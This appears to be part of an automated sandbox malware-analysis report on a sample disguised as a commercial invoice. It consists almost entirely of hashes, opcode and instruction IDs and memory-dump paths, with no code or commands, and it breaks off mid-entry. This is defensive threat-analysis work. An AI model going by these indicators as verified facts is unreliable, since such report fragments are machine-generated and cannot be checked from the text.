                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: x6nu
                                              • API String ID: 0-1949830615
                                              • Opcode ID: d817eff573122311c1a6fb0dac7bbf191f9c589fccc8484788411dbb9cb28f96
                                              • Instruction ID: c21e12cf9e91bee9635f812d3107f7c1ef1a9b05de3652a95b380fa7f0d64c83
                                              • Opcode Fuzzy Hash: d817eff573122311c1a6fb0dac7bbf191f9c589fccc8484788411dbb9cb28f96
                                              • Instruction Fuzzy Hash: 7B519B30A0DA094FE759AF2C9861AB57BD0FF56330B9402BDD44AC7193ED55F84283A0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: qM_H
                                              • API String ID: 0-3483471439
                                              • Opcode ID: 8b1600484897bd3eb937384042d3217242c6516d0017cb3741a48689615542fc
                                              • Instruction ID: 066b3f7cb5ddc7e6134404a150c9fec909ad238cb8d2e0b2231c1042425974e7
                                              • Opcode Fuzzy Hash: 8b1600484897bd3eb937384042d3217242c6516d0017cb3741a48689615542fc
                                              • Instruction Fuzzy Hash: 1D51A27071CE0A8FEB58EB2D94A4775B7D1FF49325B8482B9D00EC7286CE64E852C790
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Znu
                                              • API String ID: 0-2439342474
                                              • Opcode ID: 1e3299e59a87feca400d091d9a72cd2f69848f6dd69ac184d60ca5ad7233fc9b
                                              • Instruction ID: a2074311d31802c94cfb48d7e2995e7d84206d58f30665f1f57c2e91c6234a4a
                                              • Opcode Fuzzy Hash: 1e3299e59a87feca400d091d9a72cd2f69848f6dd69ac184d60ca5ad7233fc9b
                                              • Instruction Fuzzy Hash: BD217E30A19A8A4FDB84FF28C8956AA77E1FF58310F8045B6E41DC3296DD38E812C751
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: yM_L
                                              • API String ID: 0-225993401
                                              • Opcode ID: d8ff61e451d9790db65f86e42f300b5fdb2123ee1815d9765ff447bf8b15d89d
                                              • Instruction ID: d2a2c5dfe2eeaf821c76824b18ba000e58e98bbf6c3c31dcc5902dae0ca356b1
                                              • Opcode Fuzzy Hash: d8ff61e451d9790db65f86e42f300b5fdb2123ee1815d9765ff447bf8b15d89d
                                              • Instruction Fuzzy Hash: 74F08121B1CD1A0B966DBB1874511A9B3D1EF9873079441BED44EC338BDE68AC5242C9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: zM_L
                                              • API String ID: 0-533581143
                                              • Opcode ID: f4f9903416e24f2e7eaf21721b8a6a9adadc8d1344ece6924e1970bd54ef97fd
                                              • Instruction ID: 10f2cfe9869c9efc061f84f9e184b43cfe94b5071dbafbadf829dac5fc8bed26
                                              • Opcode Fuzzy Hash: f4f9903416e24f2e7eaf21721b8a6a9adadc8d1344ece6924e1970bd54ef97fd
                                              • Instruction Fuzzy Hash: C2F0AF21B0CD1A0B966CFA1CA4501B9B3D2EF8833079446BED44EC338ACE68B8534284
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: !N_
                                              • API String ID: 0-2108449847
                                              • Opcode ID: 5d3c606f275f2271dc9cca9c7c054962b4e2aa8de64b59e3d2da168b1d19593f
                                              • Instruction ID: 538714abc9de091c77cacebe1d51489dc084655c506492c0d4f1ddcc7655fc57
                                              • Opcode Fuzzy Hash: 5d3c606f275f2271dc9cca9c7c054962b4e2aa8de64b59e3d2da168b1d19593f
                                              • Instruction Fuzzy Hash: D6F0C87260E94A4FEB44A36C64561A9F7D1FF963713580277C046CB656DE28F8538341
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: {M_L
                                              • API String ID: 0-2809244210
                                              • Opcode ID: 3b346e181d26598a78997e791c7b877ec1db4af6ec221e66379baf3d813c3c36
                                              • Instruction ID: 7889a9841e24469b3a51c661bf6e0da45d0631e594e7c68576a487fd707cbc14
                                              • Opcode Fuzzy Hash: 3b346e181d26598a78997e791c7b877ec1db4af6ec221e66379baf3d813c3c36
                                              • Instruction Fuzzy Hash: 45F0AF21B0CD1A4B966CFB1CA4411A9B3D1EF4833079446BED44FC338BDE68B85782C4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: x6nu
                                              • API String ID: 0-1949830615
                                              • Opcode ID: 3bcee83904fb0a3a4de2c9482ea978569d7f754a6334f12b6d0b5c927ed9d1e5
                                              • Instruction ID: b07aa29ae77bd3d3e2b6353341c399358503d45a748b694eb71a6c23781443fa
                                              • Opcode Fuzzy Hash: 3bcee83904fb0a3a4de2c9482ea978569d7f754a6334f12b6d0b5c927ed9d1e5
                                              • Instruction Fuzzy Hash: 2001FB30619A049FCB94EF2CD49596577E2FF9832035906E9E04ACB3A6CE24FC01CB80
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d81bbbb947a5df8ad61a7b081e635af6040e8b0a6b00513a501694841d5076a3
                                              • Instruction ID: da29f39420c98f7e39004f07eee61d1af11c099ae55b7c555c9d04d6a69474fd
                                              • Opcode Fuzzy Hash: d81bbbb947a5df8ad61a7b081e635af6040e8b0a6b00513a501694841d5076a3
                                              • Instruction Fuzzy Hash: EF229E307099498FDBE4EF2C9468B68B7E2FF9932174542FAD44ECB2A6DE24DC418740
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c2415f1c10e5747a6257371aab61b639f5b9e9799332711ba975c0be8fea6824
                                              • Instruction ID: a49a51c9e92e0bff0f8e3abbae2514b4bfc1ab18e681398f00c78505b35b3f89
                                              • Opcode Fuzzy Hash: c2415f1c10e5747a6257371aab61b639f5b9e9799332711ba975c0be8fea6824
                                              • Instruction Fuzzy Hash: F4E1553060CD0A8FEB98EF18D4A0A61B3E2FF99324B6445B9C40DC7696CE75EC92C751
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7b219552b4cdc11edf4625aac4791af1985a19ae2426f5d47764faace4349be5
                                              • Instruction ID: 7296b07fba66781c15e754552d80e74541956c006209337c76237c4a5d0c61d1
                                              • Opcode Fuzzy Hash: 7b219552b4cdc11edf4625aac4791af1985a19ae2426f5d47764faace4349be5
                                              • Instruction Fuzzy Hash: DEE1413061CE0A8FEB98EE18C494A71B3E2FF55324B54457DD04EC7686DA35F892C790
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4c8fe6828f4804fa607cdf7443b769e2cbcab46f8828f477f06f840af2c9bb2a
                                              • Instruction ID: 480fded19bd336e32b891cf39c6e68bad1fb918ae4fcbec5de88a6b83e6d864b
                                              • Opcode Fuzzy Hash: 4c8fe6828f4804fa607cdf7443b769e2cbcab46f8828f477f06f840af2c9bb2a
                                              • Instruction Fuzzy Hash: 82A17120B1CE0A8BFFA5BF5854653B4A3C3EF99375BD80179D80DC3286DD59EC2642A0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 055ffb375fadc19c97499f47d9ab7c4026bb72a0af1c44e6c36be45363b7d2e1
                                              • Instruction ID: 82b518682740df9aa29d88db7a12c2ed9fca8b02f0aabc855ba21a014fd270fb
                                              • Opcode Fuzzy Hash: 055ffb375fadc19c97499f47d9ab7c4026bb72a0af1c44e6c36be45363b7d2e1
                                              • Instruction Fuzzy Hash: 23B13B70A1894D8FDB94EF2CD899BA9B7E2FF59320B4501A9E409D7262CE70E851CB40
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 09b273d1b56c16ac0bc226d0697ec5ceee2d63faf2d9a1064dc6fcd13ec5fd19
                                              • Instruction ID: 99c09424304f897ae94715f1959760d26b498354ce7b04e3e06eba352d464756
                                              • Opcode Fuzzy Hash: 09b273d1b56c16ac0bc226d0697ec5ceee2d63faf2d9a1064dc6fcd13ec5fd19
                                              • Instruction Fuzzy Hash: 2DA12721A0DA894FD786EB388858774BBE1FF96721BCD01FAC04DCB2A3DD18AC558751
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6bef94d24b9251449e77dc46c854a2d37ce0a3ac7aa8ee1bf74cb694d3b2d8a4
                                              • Instruction ID: 2d74582b04976b02dc36f77ae6c002439a635d35620157a476bd7fb55f0ce8e7
                                              • Opcode Fuzzy Hash: 6bef94d24b9251449e77dc46c854a2d37ce0a3ac7aa8ee1bf74cb694d3b2d8a4
                                              • Instruction Fuzzy Hash: 9BA12F71A18E0A8FDB58FB18D4819A5B3E1FFA831175446AED04BC3696DF34F846CB81
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 472b353464bb79abdffbb00c27c502b8fe173f0a9a3d94de3a34127f75a3d328
                                              • Instruction ID: b1b160996d9f0df1cd5f27c716467d58c51d465f70f741a082fbfa3428e326ba
                                              • Opcode Fuzzy Hash: 472b353464bb79abdffbb00c27c502b8fe173f0a9a3d94de3a34127f75a3d328
                                              • Instruction Fuzzy Hash: D4911871A0CA4A4FD349FB2898512F9B7D1EF86334B8443BED48EC7193DD69B8428391
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4591fa09e100827dd159c4a0869d38589919c8907dd0652ff000538af0f92c66
                                              • Instruction ID: 4f1ae713da203979f2c661e1f3758681e08a5bd8ddd181078cf671b887b2213d
                                              • Opcode Fuzzy Hash: 4591fa09e100827dd159c4a0869d38589919c8907dd0652ff000538af0f92c66
                                              • Instruction Fuzzy Hash: B2913A61E0EAC25FE315AA7858261BABFD0EF5377479C41BAC089CB0D3DC49A8568361
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ef5de3a01d6eb8526736794c182b0975f83b2c079037de77c6bb7fc5dfa00eca
                                              • Instruction ID: 973abc91d8ab2a04af8dfef31ab57505800c21b2373fa7d7c7b88b0e0c6456c1
                                              • Opcode Fuzzy Hash: ef5de3a01d6eb8526736794c182b0975f83b2c079037de77c6bb7fc5dfa00eca
                                              • Instruction Fuzzy Hash: 3061C263B0D96617D7107ABCBC557E9E780EF823B7B488277D289C6183CD44744A83E5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 261db014c105946d0c333c3dfe19d278ab4dc71b9298867ab51789d229d80323
                                              • Instruction ID: f4240796569dc5a65b329a4c22ade4ed9d954b874648bf0ec805704135565218
                                              • Opcode Fuzzy Hash: 261db014c105946d0c333c3dfe19d278ab4dc71b9298867ab51789d229d80323
                                              • Instruction Fuzzy Hash: A4815F3061CE098FEB58EF1CC894A71F3E1EB95324B6445B9D04EC7696CA65FC82C7A0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9900239ff5d545dc1b9901001269c95764c5f2607f29a349ece71c118d05936b
                                              • Instruction ID: 062affd40527a1d90a66edb483844da40a07ea4ff06ee0435ce68244f2a0206f
                                              • Opcode Fuzzy Hash: 9900239ff5d545dc1b9901001269c95764c5f2607f29a349ece71c118d05936b
                                              • Instruction Fuzzy Hash: 4781263090EB8A9FD752AB7894516A5BBF0FF46320B8902FAC049C7197CE2C6C56C791
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d874cf0e61cf255a92ceb5589a82739dfb87a1ac00d40fb28bbc6c38947584fe
                                              • Instruction ID: d88898fb51d4bbcfdda3bc4992e47666d8e65170574e5669cf18cc94ad326abb
                                              • Opcode Fuzzy Hash: d874cf0e61cf255a92ceb5589a82739dfb87a1ac00d40fb28bbc6c38947584fe
                                              • Instruction Fuzzy Hash: 1371083060C6499FD709FF2894559B5BBE1EF45330BA401BDD049C72A7CE69BC52C791
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 391491cfb12238fb5514467d5a9d2ada92e37d3da2debb6bfd37ecf9200e2f59
                                              • Instruction ID: 7714e83f2bc43de684f26ff047c05f36a32c9a4b8ca8f3ecee8a2dc4510e8c70
                                              • Opcode Fuzzy Hash: 391491cfb12238fb5514467d5a9d2ada92e37d3da2debb6bfd37ecf9200e2f59
                                              • Instruction Fuzzy Hash: C571A0A250F6965FD302B77D78A52D9BFA0DF0327E74843F3C0C88A293DD59345A82A5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 905cd43c72f94cca96da27b932a7146f99d209a86372bf36aa152af3c0ff9990
                                              • Instruction ID: 09e74203d5cbff00353295d1e1935a98125d2a6ab88bd96fc42c387117216bb0
                                              • Opcode Fuzzy Hash: 905cd43c72f94cca96da27b932a7146f99d209a86372bf36aa152af3c0ff9990
                                              • Instruction Fuzzy Hash: D861C53020CA098FDB88EF18D459A79B3E1FF99330B5445BDE54EC72A2DE65AC52C780
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e25bcb224638d9bac317c7c92d67ae478f06984bbfec1719b2b4e9a0e1d4c3cd
                                              • Instruction ID: a1104b209f0425e776c6af77b6fd3dccf996d4f3d06055e6dcd7f1d77e532a37
                                              • Opcode Fuzzy Hash: e25bcb224638d9bac317c7c92d67ae478f06984bbfec1719b2b4e9a0e1d4c3cd
                                              • Instruction Fuzzy Hash: C9714B3061C9498FEB94FF2C9468B79B7E2FF59310B4440B9D44ECB2A6DE28EC418791
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335798000.00007FF7C1940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1940000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1940000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 960bb449f699db7c25a3239029bea545915c1cae20eba5d5e5a124d2872f6d25
                                              • Instruction ID: 269277d48263d03b0ff6b7dcf5f37a39abb862f5cff6216ad8b657a1ce296dac
                                              • Opcode Fuzzy Hash: 960bb449f699db7c25a3239029bea545915c1cae20eba5d5e5a124d2872f6d25
                                              • Instruction Fuzzy Hash: 6761043090DBC94FDB56EB2488655A5BBF0EF57314B4A01FBC04ACB1E3DE68A805C791
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ff8bbea2e3f08842cac1db2eab496ca52f68a6cf401d707b6d1e4a81773e65f2
                                              • Instruction ID: 189f5aa68c7fb7f58ef09f45a54a73d845b2e87a680b5e780aff42ebe1269095
                                              • Opcode Fuzzy Hash: ff8bbea2e3f08842cac1db2eab496ca52f68a6cf401d707b6d1e4a81773e65f2
                                              • Instruction Fuzzy Hash: 06519A71B1C71C4F9B58EE5CA8464BDB7E1EB99731F50023FE44AC3211EA21B85386C6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4a922a9d1287c34efcf1d51a38abae8dcba080173b4f830961e207e4908d2a38
                                              • Instruction ID: e22b63553ee8e0cb34b204dccb355fbcc6030782886332430837faa0bc8cd7e7
                                              • Opcode Fuzzy Hash: 4a922a9d1287c34efcf1d51a38abae8dcba080173b4f830961e207e4908d2a38
                                              • Instruction Fuzzy Hash: 8B51E331B0CD0A4FD794FF2C9868674B7D2FF9967175801BAE00EC72A2DE69AC428740
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c602b121e4733c817a5aa3a0e596f71d19c264071ffb666bb817bf83d87d0fd3
                                              • Instruction ID: 068a846b31ed0ca229f3cf20418dd8be4d4d006e6a67a475a7678b0d4fe0c717
                                              • Opcode Fuzzy Hash: c602b121e4733c817a5aa3a0e596f71d19c264071ffb666bb817bf83d87d0fd3
                                              • Instruction Fuzzy Hash: F651E362B0E9661BD7147BACBC157EAF780EF823B67888377D24DC6183CD54740682E5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 521b2e34d0216fca18f26aa42ba6229b3ff9314b2b946b52716c43dc8a42e8c4
                                              • Instruction ID: 48faaa7fb39feefc82dd2bea8e8798a9771c1339ed38ded2e4de7d0c468154b0
                                              • Opcode Fuzzy Hash: 521b2e34d0216fca18f26aa42ba6229b3ff9314b2b946b52716c43dc8a42e8c4
                                              • Instruction Fuzzy Hash: 86516B70718A498FDB98EF288495A65B3E1FF99325B50427EE44FC33A2DE35E842C740
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a98b9f23e2e9927cc02317aeac142dcfe0a24fa2332d3449a875af10f706f0b7
                                              • Instruction ID: f6f4f374c93d148745115968ae7e0fd7188ce2f6f4b24a8d417c6892ccbbb12f
                                              • Opcode Fuzzy Hash: a98b9f23e2e9927cc02317aeac142dcfe0a24fa2332d3449a875af10f706f0b7
                                              • Instruction Fuzzy Hash: A751F5A520E9C58FD3159B7CA8253E9FF60FF4736530843EBC0898B5A7CD24A91987C5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4e8fd96632f8128dc3b50c86febb4fe77f42c46c41cfcb2e53014e7bd03a1da8
                                              • Instruction ID: fd1b0e75ae4508f74451b1da401e7c2d7f2fc113c306c08f69d14f8e1daf92e9
                                              • Opcode Fuzzy Hash: 4e8fd96632f8128dc3b50c86febb4fe77f42c46c41cfcb2e53014e7bd03a1da8
                                              • Instruction Fuzzy Hash: 65515C70A18F498FD758DB2884597A6B7E1FF68311F1086AED08FC3656DE34B506C781
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ae7ba56141e4847c085ab3a72d02082e3d294f722d5f91cf51a6a4b551d6c82f
                                              • Instruction ID: 9780ce3a5f40cb8a2358469ab6e4a84b60eacc2688e61b7acd13d80d4ddf8cfc
                                              • Opcode Fuzzy Hash: ae7ba56141e4847c085ab3a72d02082e3d294f722d5f91cf51a6a4b551d6c82f
                                              • Instruction Fuzzy Hash: 9551226050E7C20FE756AA7898A51BABFE1DF47A30B8D01FEC48ACB093C94D5C578361
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 87e6004428718fe831fcb542d6027877a05ba85f3373a84be9e1cdb00310df98
                                              • Instruction ID: bef5e9cd039cc723829d24b4d65ca13fa91025dcb373779c73fcdf3639ad61fb
                                              • Opcode Fuzzy Hash: 87e6004428718fe831fcb542d6027877a05ba85f3373a84be9e1cdb00310df98
                                              • Instruction Fuzzy Hash: 465105A520EAC58FD3199B7C68253E9FF60FF4736530843EBC089875A7CD24A81987C5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1b2ba36087018fd00940b04640f683cfba66bb27d04447ed21e926d80b0d2dc8
                                              • Instruction ID: 04d4f1a5ebf90609486493cf4eb4751fddfc916db21d9c039880a5f10b092420
                                              • Opcode Fuzzy Hash: 1b2ba36087018fd00940b04640f683cfba66bb27d04447ed21e926d80b0d2dc8
